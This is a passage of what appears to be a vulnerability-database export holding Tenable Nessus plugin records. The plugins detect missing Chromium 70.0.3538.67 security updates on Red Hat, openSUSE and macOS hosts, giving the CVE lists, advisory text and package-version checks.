(CVE-2018-17462)\n\n* chromium-browser: Remote code execution in V8 (CVE-2018-17463)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17464)\n\n* chromium-browser: Use after free in V8 (CVE-2018-17465)\n\n* chromium-browser: Memory corruption in Angle (CVE-2018-17466)\n\n* lcms2: Integer overflow in AllocateDataSet() in cmscgats.c leading\nto heap-based buffer overflow (CVE-2018-16435)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17467)\n\n* chromium-browser: Cross-origin URL disclosure in Blink\n(CVE-2018-17468)\n\n* chromium-browser: Heap buffer overflow in PDFium (CVE-2018-17469)\n\n* chromium-browser: Memory corruption in GPU Internals\n(CVE-2018-17470)\n\n* chromium-browser: Security UI occlusion in full screen mode\n(CVE-2018-17471)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17473)\n\n* chromium-browser: Use after free in Blink (CVE-2018-17474)\n\n* chromium-browser: Lack of limits on update() in ServiceWorker\n(CVE-2018-5179)\n\n* chromium-browser: URL spoof in Omnibox (CVE-2018-17475)\n\n* chromium-browser: Security UI occlusion in full screen mode\n(CVE-2018-17476)\n\n* chromium-browser: UI spoof in Extensions (CVE-2018-17477)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2018:3004\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-5179\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-16435\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17462\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17463\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17464\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17465\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17466\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17467\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17468\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17469\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17470\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17471\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17473\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17474\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17475\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17476\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2018-17477\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17462\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:3004\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-70.0.3538.67-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:41", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-23T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2018-1208)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2018-1208.NASL", "href": "https://www.tenable.com/plugins/nessus/118317", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2018-1208.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118317);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2018-1208)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware\n accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-70.0.3538.67-lp150.2.20.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T15:16:00", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2019-712)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-712.NASL", "href": "https://www.tenable.com/plugins/nessus/123310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-712.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123310);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2019-712)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware\n accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-70.0.3538.67-lp150.2.20.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-70.0.3538.67-lp150.2.20.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-70.0.3538.67-lp150.2.20.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T18:53:09", "description": "The version of Google Chrome installed on the remote macOS host is prior to 70.0.3538.67. It is, therefore, affected by multiple vulnerabilities as noted in Google Chrome stable channel update release notes for 2018/10/16. Please refer to the release notes for additional information. Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self- reported version number.", "cvss3": {"score": 9.6, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2018-10-16T00:00:00", "type": "nessus", "title": "Google Chrome < 70.0.3538.67 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_70_0_3538_67.NASL", "href": "https://www.tenable.com/plugins/nessus/118152", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(118152);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-5179\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Google Chrome < 70.0.3538.67 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by\nmultiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is\nprior to 70.0.3538.67. It is, therefore, affected by multiple\nvulnerabilities as noted in Google Chrome stable channel update\nrelease notes for 2018/10/16. Please refer to the release notes for\nadditional information. Note that Nessus has not attempted to exploit\nthese issues but has instead relied only on the application's self-\nreported version number.\");\n # https://chromereleases.googleblog.com/2018/10/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c8f5c86\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 70.0.3538.67 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2018-17472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n 